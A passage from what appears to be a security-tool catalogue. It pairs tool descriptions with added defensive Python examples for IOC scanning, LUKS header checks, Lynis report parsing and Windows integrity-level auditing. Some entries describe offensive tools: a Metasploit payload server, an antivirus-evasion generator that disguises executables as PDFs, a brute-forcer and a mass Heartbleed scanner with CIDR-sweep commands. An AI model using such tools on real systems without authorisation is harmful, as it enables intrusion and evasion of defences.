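def scan_path(root: str, max_kb: int = 2000) -> List[Tuple[str, str, int, List[str]]]:
    """Walk root; files larger than max_kb KB are skipped (LOKI's -s behaviour).
    Returns (path relative to root, verdict, score, reasons) per scanned file."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(dirpath, name)
            if os.path.getsize(full) > max_kb * 1024:
                continue
            score, reasons = score_file(full)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            results.append((rel, verdict(score), score, reasons))
    return results


def build_sample_tree() -> str:
    """Constructed directory tree: clean file, two hash matches, a name match, an oversize file."""
    root = tempfile.mkdtemp(prefix="ioc_demo_")
    os.makedirs(os.path.join(root, "temp"))
    files = {
        "clean.txt": b"nothing to see here\n",
        "report.docx": SAMPLE_A,
        "invoice.pdf": SAMPLE_B,
        os.path.join("temp", "abcdefgh.exe"): b"MZ constructed stub\n",
        "big.bin": b"\0" * 2048,
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, color, score, reasons in scan_path(build_sample_tree(), max_kb=1):
        print(f"{color:6} {score:3d} {rel}  {'; '.join(reasons)}")
```

Keeping the hash list as one set of lowercase digests, as done here, is what lets a single IOC file mix MD5, SHA1 and SHA256 entries from different sources without tagging each one.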
Usage
usage: loki.exe [-h] [-p path] [-s kilobyte] [--printAll] [--noprocscan]
                [--nofilescan] [--noindicator] [--debug]

Loki - Simple IOC Scanner

optional arguments:
  -h, --help     show this help message and exit
  -p path        Path to scan
  -s kilobyte    Maximum file size to check in KB (default 2000 KB)
  --printAll     Print all files that are scanned
  --noprocscan   Skip the process scan
  --nofilescan   Skip the file scan
  --noindicator  Do not show a progress indicator
  --debug        Debug output

Download Loki
LUKS-OPS - AUTOMATE THE USAGE OF LUKS VOLUMES
IN LINUX

A bash script to automate the most basic usage of LUKS
volumes in Linux. Like:
Creating a virtual disk volume with LUKS format.
Mounting an existing LUKS volume
Unmounting a Single LUKS volume or all LUKS volume in
the system.
Basic Usage

There is an option for a menu:
./luks-ops.sh menu or simply ./luks-ops.sh

Other options include:
./luks-ops.sh new disk_Name Size_in_numbers
./luks-ops.sh mount /path/to/device (mountpoint)
./luks-ops.sh unmount-all
./luks-ops.sh clean
./luks-ops.sh usage

Default Options:

Virtual-disk size = 512 MB and it's created on /usr/
directory
Default filesystem used = ext4
Cipher options:
Creating LUKS1: aes-xts-plain64, Key: 256 bits,
LUKS header hashing: sha1, RNG: /dev/urandom
plain: aes-cbc-essiv:sha256, Key: 256 bits, Password
hashing: ripemd160 (about-time :D)
Mounting point = /media/luks_* where * is random-string.
Others.. NB. You can change /dev/urandom to /dev/zero
(speed?)
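The cipher, key size and header hash listed above are recorded in the LUKS1 header of the volume the script creates, so they can be verified after the fact instead of trusted. The following added example (not part of luks-ops) parses a LUKS1 header and checks it against those defaults. The on-disk layout it assumes is the LUKS1 specification's: a 592-byte header with big-endian integers (6-byte magic, version, 32-byte cipher name, cipher mode and hash spec, payload offset in sectors, key bytes, master-key digest, salt and iteration count, 40-byte UUID) followed by eight 48-byte key slots whose active marker is 0x00AC71F3. The header it inspects is constructed in memory; on a real volume you would read the first 592 bytes of the device instead.

```python
"""LUKS1 header parser with a check against expected cipher settings.
Added example; not luks-ops code. Layout per the LUKS1 spec; demo header
constructed below, with placeholder digest, salt and UUID values."""
import struct
from typing import Dict, List

LUKS_MAGIC = b"LUKS\xba\xbe"
LUKS1_VERSION = 1
# magic, version, cipher-name, cipher-mode, hash-spec, payload-offset, key-bytes,
# mk-digest, mk-digest-salt, mk-digest-iter, uuid  (208 bytes, big-endian)
MAIN = struct.Struct(">6sH32s32s32sII20s32sI40s")
# per key slot: active, iterations, salt, key-material-offset, stripes (48 bytes)
SLOT = struct.Struct(">II32sII")
NUM_SLOTS = 8
SLOT_ACTIVE = 0x00AC71F3
SLOT_DISABLED = 0x0000DEAD
HEADER_SIZE = MAIN.size + NUM_SLOTS * SLOT.size   # 592 bytes


def _cstring(field: bytes) -> str:
    return field.split(b"\0", 1)[0].decode("ascii", "replace")


def parse_luks1_header(buf: bytes) -> Dict:
    """Decode the fixed header and the eight key slots; refuse non-LUKS1 input."""
    if len(buf) < HEADER_SIZE:
        raise ValueError("buffer shorter than a LUKS1 header")
    (magic, version, cipher, mode, hashspec, payload_off, key_bytes,
     _mk_digest, _mk_salt, mk_iter, uuid) = MAIN.unpack_from(buf, 0)
    if magic != LUKS_MAGIC:
        raise ValueError("LUKS magic not found")
    if version != LUKS1_VERSION:
        raise ValueError(f"LUKS version {version} is not handled by this parser")
    slots: List[Dict] = []
    for i in range(NUM_SLOTS):
        active, iters, _salt, kmo, stripes = SLOT.unpack_from(buf, MAIN.size + i * SLOT.size)
        slots.append({"index": i, "active": active == SLOT_ACTIVE,
                      "iterations": iters, "key_material_offset": kmo, "stripes": stripes})
    return {"cipher": _cstring(cipher), "mode": _cstring(mode), "hash": _cstring(hashspec),
            "payload_offset_sectors": payload_off, "key_bits": key_bytes * 8,
            "mk_digest_iterations": mk_iter, "uuid": _cstring(uuid), "slots": slots}


def is_luks1(buf: bytes) -> bool:
    try:
        parse_luks1_header(buf)
        return True
    except ValueError:
        return False


def check_defaults(hdr: Dict, cipher: str = "aes", mode: str = "xts-plain64",
                   hashspec: str = "sha1", key_bits: int = 256) -> List[str]:
    """Findings where the header departs from the expected settings (defaults are
    the ones listed for luks-ops). An empty list means the volume matches."""
    findings = []
    if hdr["cipher"] != cipher:
        findings.append(f"cipher is {hdr['cipher']}, expected {cipher}")
    if hdr["mode"] != mode:
        findings.append(f"cipher mode is {hdr['mode']}, expected {mode}")
    if hdr["hash"] != hashspec:
        findings.append(f"header hash is {hdr['hash']}, expected {hashspec}")
    if hdr["key_bits"] != key_bits:
        findings.append(f"key size is {hdr['key_bits']} bits, expected {key_bits}")
    if not any(s["active"] for s in hdr["slots"]):
        findings.append("no active key slot: the volume cannot be unlocked")
    return findings


def build_demo_header(cipher: str = "aes", mode: str = "xts-plain64", hashspec: str = "sha1",
                      key_bytes: int = 32, active_slots=(0,), iterations: int = 100_000) -> bytes:
    """Constructed header for demonstration; digest, salt and UUID are placeholders."""
    def pad(s: str, n: int) -> bytes:
        return s.encode("ascii").ljust(n, b"\0")
    main = MAIN.pack(LUKS_MAGIC, LUKS1_VERSION, pad(cipher, 32), pad(mode, 32), pad(hashspec, 32),
                     4096, key_bytes, b"\x11" * 20, b"\x22" * 32, iterations,
                     pad("00000000-0000-0000-0000-000000000000", 40))
    slots = b"".join(
        SLOT.pack(SLOT_ACTIVE if i in active_slots else SLOT_DISABLED,
                  iterations if i in active_slots else 0, b"\x33" * 32, 8 + i * 512, 4000)
        for i in range(NUM_SLOTS))
    return main + slots


if __name__ == "__main__":
    hdr = parse_luks1_header(build_demo_header())
    print(hdr["cipher"], hdr["mode"], hdr["hash"], hdr["key_bits"], "bits")
    print("findings:", check_defaults(hdr) or "none")
```

On a live system the same check is `parse_luks1_header(open("/dev/loopN", "rb").read(592))` with the device luks-ops mapped; the parser reads only the header, never key material.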

Dependencies (Install applications:)

1. dmsetup --- low level logical volume management
2. cryptsetup --- manage plain dm-crypt and LUKS
encrypted volumes

Download LUKS-OPs
LYNIS 2.0.0 - SECURITY AUDITING TOOL FOR UNIX/LINUX
SYSTEMS

Lynis is an open source security auditing tool. Its primary goal is
to help users with auditing and hardening of Unix and Linux
based systems. The software is very flexible and runs on
almost every Unix based system (including Mac). Even the
installation of the software itself is optional!


How it works

Lynis will perform hundreds of individual tests to determine the
security state of the system. Many of these tests are also part
of common security guidelines and standards. Examples
include searching for installed software and determining possible
configuration flaws. Lynis goes further and also tests
individual software components, checks related configuration
files and measures performance. After these tests, a scan
report will be displayed with all discovered findings.
Typical use cases for Lynis:
Security auditing
Vulnerability scanning
System hardening
Requirements:

Privileged or non-privileged

Download Lynis 2.0.0
LYNIS 2.1.0 - SECURITY AUDITING TOOL FOR UNIX/LINUX
SYSTEMS

Lynis is an open source security auditing tool. Commonly used
by system administrators, security professionals and auditors,
to evaluate the security defenses of their Linux/Unix based
systems. It runs on the host itself, so it can perform very
extensive security scans.


Supported operating systems

The tool has almost no dependencies, therefore it runs on
almost all Unix based systems and versions, including:
AIX
FreeBSD
HP-UX
Linux
Mac OS
NetBSD
OpenBSD
Solaris
and others
It even runs on systems like the Raspberry Pi and several
storage devices!
No installation required

The tool is very flexible and easy to use. It is one of the few
tools, in which installation is optional. Just place it on the
system, give it a command like "audit system", and it will run. It
is written in shell script and released as open source software
(GPL).

How it works
Lynis performs hundreds of individual tests, to determine the
security state of the system. The security scan itself consists of
performing a set of steps, from initialization the program, up to
the report.
Steps
1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update

4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan

During the scan, technical details about the scan are stored in a
log file. At the same time findings (warnings, suggestions, data
collection), are stored in a report file.
Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.
For example if it sees you are running Apache, it will perform
an initial round of Apache related tests. When during the
Apache scan it also discovers a SSL/TLS configuration, it will
perform additional auditing steps on that. While doing that, it
then will collect discovered certificates, so they can be scanned
later as well.
In-depth security scans
By performing opportunistic scanning, the tool can run with
almost no dependencies. The more it finds, the deeper the
audit will be. In other words, Lynis will always perform scans
which are customized to your system. No audit will be the
same!
Use cases

Since Lynis is flexible, it is used for several different purposes.
Typical use cases for Lynis include:
Security auditing
Compliance testing (e.g. PCI, HIPAA, SOx)
Vulnerability detection and scanning
System hardening
Resources used for testing

Many other tools use the same data files for performing tests.
Since Lynis is not limited to a few common Linux distributions, it
uses tests from standards and many custom ones not found in
any other tool.
Best practices
CIS
NIST
NSA
OpenSCAP data
Vendor guides and recommendations (e.g. Debian
Gentoo, Red Hat)
Lynis Plugins

Plugins enable the tool to perform additional tests. They can be
seen as an extension (or add-on) to Lynis, enhancing its
functionality. One example is the compliance checking plugin,
which performs specific tests only applicable to some standard.
Comparison with other tools

Lynis has a different way of doing things, so you have more
flexibility. After all, you should be the one deciding what
security controls make sense for your environment. We have a
small comparison with some other well known tools:
Bastille Linux
Bastille was for a long time the best known utility for hardening Linux systems. It focuses mainly on automatically hardening the system.
Differences with Bastille
Automated hardening tools are helpful, but at the same time might give a false sense of security. Instead of just turning on some settings, Lynis performs an in-depth security scan. You are the one to decide what level of security is appropriate for your environment. After all, not all systems have to be like Fort Knox, unless you want them to be.
Benefits of Lynis
Supports more operating systems
Won't break your system
More in-depth audit

OpenVAS / Nessus
These products focus primarily on vulnerability scanning. They do this via the network by polling services. Optionally they will log in to a system and gather data.
Differences with OpenVAS / Nessus
Lynis runs on the host itself, therefore it can perform a deeper analysis compared with network based scans. Additionally, there is no risk for your business processes, and log files remain clean from connection attempts and incorrect requests. Although Lynis is an auditing tool, it will actually discover vulnerabilities as well. It does so by using existing tools and analyzing configuration files.
Lynis and OpenVAS are both open source and free to use. Nessus is closed source and paid.
Benefits of Lynis
Much faster
No pollution of log files, no disruption to business services
Host-based scans provide a more in-depth audit

Changelog
Lynis 2.1.0
= Lynis 2.1.0 (2015-04-16) =

General:
--------
Screen output has been improved to provide additional information.

OS support:
-----------
CUPS detection on Mac OS has been improved. AIX systems will now use the csum
utility to create the host ID. The group check has been altered on AIX to include
-n ALL. The core dump check on Linux is extended to check for actual values
as well.

Software:
---------
McAfee detection has been extended by detecting a running cma binary.
Improved detection of the pf firewall on BSD and Mac OS. Security patch checking
with zypper extended.

Session timeout:
----------------
Tests to determine the shell timeout setting have been extended to account for
AIX, HP-UX and other platforms. They now also determine whether the variable is
exported as a readonly variable. The related compliance section, PCI DSS 8.1.8,
has been extended.

Documentation:
--------------
- New document: Getting started with Lynis
  https://cisofy.com/documentation/lynis/get-started/

Plugins (Enterprise):
---------------------
- Update to file integrity plugin
- Changes to PLGN-2606 (capabilities check)
- New configuration plugins:
  PLGN-4802 (SSH settings)
  PLGN-4804 (login.defs)

Download Lynis 2.1.0


LYNIS 2.1.1 - SECURITY AUDITING TOOL FOR UNIX/LINUX SYSTEMS

Lynis is an open source security auditing tool. Commonly used by system administrators, security professionals and auditors, to evaluate the security defenses of their Linux/Unix based systems. It runs on the host itself, so it can perform very extensive security scans.
Supported operating systems
The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:
AIX
FreeBSD
HP-UX
Linux
Mac OS
NetBSD
OpenBSD
Solaris
and others
It even runs on systems like the Raspberry Pi and several storage devices!
No installation required
The tool is very flexible and easy to use. It is one of the few tools in which installation is optional. Just place it on the system, give it a command like "audit system", and it will run. It is written in shell script and released as open source software (GPL).

How it works
Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of performing a set of steps, from initializing the program up to the report.
Parameters
--auditor "Given name Surname"   Assign an auditor name to the audit (report)
--checkall, -c                   Start the check
--check-update                   Check if Lynis is up-to-date
--cronjob                        Run Lynis as cronjob (includes -c -Q)
--help, -h                       Shows valid parameters
--manpage                        View man page
--nocolors                       Do not use any colors
--pentest                        Perform a penetration test scan (non-privileged)
--quick, -Q                      Don't wait for user input, except on errors
--quiet                          Only show warnings (includes --quick, but doesn't wait)
--reverse-colors                 Use a different color scheme for lighter backgrounds
--version, -V                    Check program version (and quit)
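Running Lynis non-interactively (lynis audit system --cronjob) is only half of an audit job; the report file it writes is what a fleet-wide job actually consumes. The script below is an added example written for this page, not part of Lynis. It reads a report in the key=value / key[]=value layout Lynis uses (by default /var/log/lynis-report.dat), splits warning and suggestion entries into test ID, message and details, and flags hosts whose hardening index is under a threshold. The sample report is constructed, and the threshold of 70 and the exact order of the pipe-separated fields after the message are assumptions of this example.

```python
"""Parse a Lynis report file (lynis-report.dat) into structured findings.

Added example, not part of Lynis. The sample report below is constructed;
real reports are written to /var/log/lynis-report.dat by `lynis audit system`
and use the same key=value / key[]=value layout.
"""
import re
from collections import defaultdict

# Constructed sample in the lynis-report.dat style: scalars as key=value,
# arrays as key[]=value, findings as TEST-ID|message|details|... (field order
# after the message is an assumption of this example).
SAMPLE_REPORT = """\
# Lynis Report
report_version_major=1
report_version_minor=0
lynis_version=2.1.1
hostname=webserver01
os=Linux
hardening_index=62
warning[]=KRNL-5830|Reboot of system is most likely needed|-|-|
warning[]=SSH-7408|Consider hardening SSH configuration|PermitRootLogin (YES --> NO)|-|
suggestion[]=BOOT-5122|Set a password on GRUB bootloader to prevent altering boot configuration|-|-|
suggestion[]=SSH-7408|Consider hardening SSH configuration|X11Forwarding (YES --> NO)|-|
suggestion[]=AUTH-9286|Configure minimum password age in /etc/login.defs|-|-|
installed_packages=412
"""

LINE_RE = re.compile(r"^([A-Za-z0-9_]+)(\[\])?=(.*)$")


def parse_report(text):
    """Return (scalars, arrays): scalars is key->value, arrays is key->[values]."""
    scalars, arrays = {}, defaultdict(list)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue  # tolerate lines we do not understand rather than abort
        key, is_array, value = m.groups()
        if is_array:
            arrays[key].append(value)
        else:
            scalars[key] = value
    return scalars, dict(arrays)


def findings(arrays, kind):
    """Split warning[]/suggestion[] entries into (test_id, message, details)."""
    out = []
    for raw in arrays.get(kind, []):
        parts = raw.split("|")
        test_id = parts[0]
        message = parts[1] if len(parts) > 1 else ""
        details = parts[2] if len(parts) > 2 and parts[2] != "-" else ""
        out.append((test_id, message, details))
    return out


def summarize(text, min_index=70):
    """Return the figures a fleet-auditing job would act on for one host."""
    scalars, arrays = parse_report(text)
    index = int(scalars.get("hardening_index", "0"))
    warnings = findings(arrays, "warning")
    suggestions = findings(arrays, "suggestion")
    tests = sorted({t for t, _, _ in warnings} | {t for t, _, _ in suggestions})
    return {
        "host": scalars.get("hostname", "?"),
        "hardening_index": index,
        "below_threshold": index < min_index,
        "warning_count": len(warnings),
        "suggestion_count": len(suggestions),
        "tests": tests,
        "warnings": warnings,
    }


if __name__ == "__main__":
    s = summarize(SAMPLE_REPORT)
    print(f"{s['host']}: hardening index {s['hardening_index']}")
    for test_id, message, details in s["warnings"]:
        print(f"  [{test_id}] {message} {details}".rstrip())
```

Warnings are what Lynis considers must-fix; the test IDs (e.g. SSH-7408) are stable across versions and are the right key for tracking a finding from one scan to the next, whereas the message text changes between releases.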

Changelog
Lynis 2.1.1
= Lynis 2.1.1 (2015-07-22) =

This release adds a lot of improvements, with focus on performance, and
additional support for common Linux distributions and external utilities.
We recommend to use this latest version.

* Operating system enhancements
------------------------------
Support for systems like CentOS, openSUSE, Slackware is improved.

* Performance
------------
Performance tuning has been applied, to speed up execution of the audit on
systems with many files. This also includes code cleanups.

* Automatic updates
------------------
Initial work on an automatic updater has been implemented. This way Lynis
can be scheduled for automatic updating from a trusted source.

* Internal functions
-------------------
Not all systems have readlink, or the -f option of readlink. The
ShowSymlinkPath function has been extended with a Python based check, which
is often available.

* Software support
-----------------
Apache module directory /usr/lib64/apache has been added, which is used on
openSUSE.
Support for Chef has been added.
Added tests for CSF's lfd utility for integrity monitoring on directories and
files. Related tests are FINT-4334 and FINT-4336.
Added support for Chrony time daemon and timesync daemon. Additionally NTP
synchronization status is checked when it is enabled.
Improved single user mode protection on the rescue.service file.

* Other
------
Check for user permissions has been extended.
Python binary is now detected, to help with symlink detection.
Several new legal terms have been added, which are used for usage in banners.
In several files old tests have been removed, to further clean up the code.

* Bug fixes
---------
Nginx test showed error when access_log had multiple parameters.
Tests using locate won't be performed if not present.
Fix false positive match on Squid unsafe ports [SQD-3624].
The hardening index is now also inserted into the report if it is not displayed
on screen.

* Functions
--------
Added AddSystemGroup function

* New tests
--------
Several new tests have been added:
[PKGS-7366] Scan for debsecan utility on Debian systems
[PKGS-7410] Determine amount of installed kernel packages
[TIME-3106] Check synchronization status of NTP on systemd based systems
[CONT-8102] Docker daemon status and gather basic details
[CONT-8104] Check docker info for any Docker warnings
[CONT-8106] Check total, running and unused Docker containers

* Plugins
--------
[PLGN-2602] Disabled by default, as it may be too slow for some machines
[PLGN-3002] Extended with /sbin/nologin

* Documentation
--------------
A new document has been created to help with the process of upgrading Lynis.
It is available at https://cisofy.com/documentation/lynis/upgrading/

-------------------------------------------------------------

Download Lynis 2.1.1


MALHEUR - AUTOMATIC ANALYSIS OF MALWARE BEHAVIOR

A novel tool for malware analysis
Malheur is a tool for the automatic analysis of malware behavior (program behavior recorded from malicious software in a sandbox environment). It has been designed to support the regular analysis of malicious software and the development of detection and defense measures. Malheur allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes.

Analysis of malware behavior?
Malheur builds on the concept of dynamic analysis: malware binaries are collected in the wild and executed in a sandbox, where their behavior is monitored during run-time. The execution of each malware binary results in a report of recorded behavior. Malheur analyzes these reports for discovery and discrimination of malware classes using machine learning.
Malheur can be applied to recorded behavior of various formats, as long as monitored events are separated by delimiter symbols, for example as in reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox and Joebox.
Malheur allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes. It supports four basic actions for analysis which can be applied to reports of recorded behavior:
1. Extraction of prototypes: From a given set of reports, Malheur identifies a subset of prototypes representative of the full data set. The prototypes provide a quick overview of recorded behavior and can be used to guide manual inspection.
2. Clustering of behavior: Malheur automatically identifies groups (clusters) of reports containing similar behavior. Clustering allows for discovering novel classes of malware and provides the basis for crafting specific detection and defense mechanisms, such as anti-virus signatures.
3. Classification of behavior: Based on a set of previously clustered reports, Malheur is able to assign unknown behavior to known groups of malware. Classification enables identifying novel and unknown variants of malware and can be used to filter program behavior prior to manual inspection.
4. Incremental analysis: Malheur can be applied incrementally for analysis of large data sets. By processing reports in chunks, the run-time as well as memory requirements can be significantly reduced. This renders long-term application of Malheur feasible, for example for daily analysis of incoming malware programs.
Dependencies
libconfig >= 1.4, http://www.hyperrealm.com/libconfig/
libarchive >= 2.70, http://libarchive.github.com/

Debian & Ubuntu Linux
The following packages need to be installed for compiling Malheur on Debian and Ubuntu Linux:
gcc
libconfig9-dev
libarchive-dev
For bootstrapping Malheur from the GIT repository or manipulating the automake/autoconf configuration, the following additional packages are necessary:
automake
autoconf
libtool

Mac OS X
For compiling Malheur on Mac OS X a working installation of Xcode is required, including gcc. Additionally, the following packages need to be installed via Homebrew:
libconfig
libarchive (from homebrew-alt)

OpenBSD
For compiling Malheur on OpenBSD the following packages are required. Note that you need to use gmake instead of make for building Malheur.
gmake
libconfig
libarchive
For bootstrapping Malheur from the GIT repository, the following packages need to be installed additionally:
autoconf
automake
libtool

Compilation & Installation
From GIT repository first run
$ ./bootstrap
From tarball run
$ ./configure [options]
$ make
$ make check
$ make install

Options for configure
--prefix=PATH    Set directory prefix for installation
By default Malheur is installed into /usr/local. If you prefer a different location, use this option to select an installation directory.

Download MALHEUR
MALIGNO V2.0 - METASPLOIT PAYLOAD SERVER

Maligno is an open source penetration testing tool written in Python that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. The shellcode is encrypted with AES and encoded prior to transmission.
Maligno also comes with a client tool, which supports HTTP, HTTPS and encryption capabilities. The client is able to connect to Maligno in order to download an encrypted Metasploit payload. Once the shellcode is received, the client will decode it, decrypt it and inject it in the target machine.
The client-server communications can be configured in a way that allows you to simulate specific C&C communications or targeted attacks. In other words, the tool can be used as part of adversary replication engagements.
Are you new to Maligno? Check the Maligno Video Series with examples and tutorials.

Changelog: Adversary replication functionality improvements. POST and HEAD method support added, new client profile added, server multithreading support added, perpetual shell mode added, client static HTTP(S) proxy support added, documentation and stability improvements.
Important: Configuration files or profiles made for Maligno v1.x are not compatible with Maligno v2.0.

Download Maligno v2.0
MALWARE - MALWARE REPOSITORY FRAMEWORK

malwaRE is a malware repository website created using the PHP Laravel framework, used to manage your own malware zoo. malwaRE was based on the work of the Adlice team with some extra features.
If you guys have any improvements, please let me know or send me a pull request.
Features
Self-hosted solution (PHP/MySQL server needed)
VirusTotal results (option for uploading unknown samples)
Search filters available (vendor, filename, hash, tag)
Vendor name is picked from VirusTotal results in that order: Microsoft, Kaspersky, Bitdefender
Add writeup URL(s) for each sample
Manage samples by tag
Tag autocomplete
VirusTotal rescan button (VirusTotal's score column)
Download samples from repository

Download MalwaRE
MASSBLEED - MASS SSL VULNERABILITY SCANNER

USAGE
sh massbleed.sh [CIDR|IP] [single|port|subnet] [port] [proxy]

ABOUT
This script has four main functions, with the ability to proxy all connections:
1. Mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)
2. Scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)
3. Individually scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)
4. Scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh massbleed.sh 192.168.0. subnet)
PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
PROXY USAGE EXAMPLES:
sh massbleed.sh 192.168.0.0/16 0 0 proxy
sh massbleed.sh 192.168.0.0/16 port 8443 proxy
sh massbleed.sh 127.0.0.1 single 0 proxy
sh massbleed.sh 192.168.0. subnet 0 proxy
Note that the arguments are positional: unused ones must be filled (here with 0) so that the proxy keyword lands in the fourth position.
VULNERABILITIES:
1. OpenSSL Heartbleed vulnerability (CVE-2014-0160)
2. OpenSSL CCS injection (MITM) vulnerability (CVE-2014-0224)
3. POODLE SSLv3 vulnerability (CVE-2014-3566)

Download MassBleed

MEDUSA - SPEEDY, PARALLEL AND MODULAR LOGIN BRUTE-FORCER

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers the following items as some of the key features of this application:
Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.
Why?
Why create Medusa? Isn't this the same thing as THC-Hydra? Here are some of the reasons for this application:
Application stability. Maybe I'm just lame, but Hydra frequently crashed on me. I was no longer confident that Hydra was actually doing what it claimed to be. Rather than fix Hydra, I decided to create my own buggy application which could crash in new and exciting ways.
Code organization. A while back I added several features to Hydra (parallel host scanning, SMBNT module). Retrofitting the parallel host code to Hydra was a serious pain. This was mainly due to my coding ignorance, but was probably also due to Hydra not being designed from the ground-up to support this. Medusa was designed from the start to support parallel testing of hosts, users and passwords.
Speed. Hydra accomplishes its parallel testing by forking off a new process for each host and instance of the service being tested. When testing many hosts/users at once this creates a large amount of overhead as user/password lists must be duplicated for each forked process. Medusa is pthread-based and does not unnecessarily duplicate information.
Education. I am not an experienced C programmer, nor do I consider myself an expert in multi-threaded programming. Writing this application was a training exercise for me. Hopefully, the results of it will be useful for others.

Module specific details:
AFP
CVS
FTP
HTTP
IMAP
MS-SQL
MySQL
NetWare NCP
NNTP
PcAnywhere
POP3
PostgreSQL
REXEC
RDP
RLOGIN
RSH
SMBNT
SMTP-AUTH
SMTP-VRFY
SNMP
SSHv2
Subversion (SVN)
Telnet
VMware Authentication Daemon (vmauthd)
VNC
Generic Wrapper
Web Form

News
2015-06-07: Released Medusa v2.2_rc2
2015-05-28: Released Medusa v2.2_rc1
2012-05-25: Released Medusa v2.1.1
2012-04-02: Released Medusa v2.1
2011-03-04: tak and bigmoneyhat have released a Java-based GUI for Medusa (Medusa-gui)
2010-02-09: Released Medusa v2.0

Download Medusa
METASPLOIT AV EVASION - METASPLOIT PAYLOAD GENERATOR THAT AVOIDS MOST ANTI-VIRUS PRODUCTS

Metasploit payload generator that avoids most Anti-Virus products.
Installing
git clone https://github.com/nccgroup/metasploitavevasion.git
chmod +x the avoid.sh file before use.
How To Use
./avoid.sh
Then follow the on screen prompts.
Features
Easily generate a Metasploit executable payload to bypass Anti-Virus detection
Local or remote listener generation
Disguises the executable file with a PDF icon
Executable opens minimised on the victim's computer
Automatically creates AutoRun files for CDROM exploitation

Download Metasploit AV Evasion
MICENUM - MANDATORY INTEGRITY CONTROL ENUMERATOR FOR WINDOWS

In the context of the Microsoft Windows family of operating systems, Mandatory Integrity Control (MIC) is a core security feature introduced in Windows Vista and implemented in subsequent lines of Windows operating systems. It adds Integrity Level (IL)-based isolation to running processes and objects. The IL represents the level of trustworthiness of an object, and it may be set on files, folders, etc. Believe it or not, there is no graphical interface for dealing with MIC in Windows. MicEnum has been created to solve this, and as a tool for forensics.
MicEnum is a simple graphical tool that:
Enumerates the Integrity Levels of the objects (files and folders) on the hard disks.
Enumerates the Integrity Levels in the registry.
Helps to detect anomalies in them by spotting differing integrity levels.
Allows storing and restoring this information in an XML file so it may be used for forensic purposes.
Allows setting or modifying the integrity levels graphically.
MicEnum scanning a folder

How does the tool work?
The only way by now to show or set Integrity Levels in Windows is by using icacls.exe, a command line tool. There is no easy or standard way to detect changes or anomalies. As with NTFS permissions, an attacker may have changed the Integrity Level of a file on a system to elevate privileges or leverage another attack, so watching this kind of movement and anomaly is important for forensics or preventive actions.
The tool represents files and folders in a tree style. The integrity level of files and folders is shown in a column next to them. By scanning a folder, the tool will check all Integrity Levels and, if any of them does not match its parent's, it will expand it. If you have expanded some folders and want to group back the ones that are known to be the same, just use the checkbox at the bottom. It will hide the folders that are supposed to share the same integrity level.
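The check MicEnum performs, comparing each object's Integrity Level with its parent's, can be reproduced from an icacls listing, which is also how you would script it on a host where the GUI is not available. The following is an added example written for this page, not MicEnum's code. It parses constructed output in the layout of `icacls C:\Apps /t` (a `Mandatory Label\... Mandatory Level` entry appears only on objects where a label was explicitly set; unlabeled objects run at Medium), then reports every object whose level differs from its parent's and whether it was raised or lowered. The sample listing, the assumption that paths contain no spaces, and the level ordering used to decide direction are this example's own.

```python
"""Spot Integrity Level anomalies in an icacls listing, the check MicEnum performs.

Added example, not MicEnum's code. The listing below is constructed in the layout
of `icacls <dir> /t`: the object path starts each block, further ACEs are indented,
and objects without an explicit label (Medium integrity) carry no label entry.
"""
import ntpath
import re

SAMPLE_ICACLS = r"""
C:\Apps BUILTIN\Administrators:(OI)(CI)(F)
        BUILTIN\Users:(OI)(CI)(RX)
C:\Apps\bin BUILTIN\Administrators:(OI)(CI)(F)
            BUILTIN\Users:(OI)(CI)(RX)
C:\Apps\bin\service.exe BUILTIN\Administrators:(F)
                        BUILTIN\Users:(RX)
                        Mandatory Label\High Mandatory Level:(NW)
C:\Apps\bin\updater.exe BUILTIN\Administrators:(F)
                        BUILTIN\Users:(RX)
C:\Apps\temp BUILTIN\Users:(OI)(CI)(F)
             Mandatory Label\Low Mandatory Level:(OI)(CI)(NW)
C:\Apps\temp\cache.dat BUILTIN\Users:(F)
                       Mandatory Label\Low Mandatory Level:(NW)
C:\Apps\temp\dropper.exe BUILTIN\Users:(F)

Successfully processed 7 files; Failed processing 0 files
"""

LEVELS = ["Untrusted", "Low", "Medium", "High", "System"]  # ascending trust
DEFAULT_LEVEL = "Medium"  # objects with no explicit label
# Assumption of this example: paths contain no spaces, so the path is the first
# token of its block and everything after it is the first ACE.
PATH_RE = re.compile(r"^([A-Za-z]:\\\S*)(?:\s+(.*))?$")
LABEL_RE = re.compile(r"Mandatory Label\\(\w+) Mandatory Level")


def parse_icacls(text):
    """Return {path: level} for every object in the listing."""
    levels, current = {}, None
    for line in text.splitlines():
        m = PATH_RE.match(line)
        if m:
            current = m.group(1)
            levels[current] = DEFAULT_LEVEL
            rest = m.group(2) or ""
        elif current is None:
            continue  # text before the first object (none in a real listing)
        else:
            rest = line  # indented continuation ACE of the current object
        lab = LABEL_RE.search(rest)
        if lab:
            levels[current] = lab.group(1)
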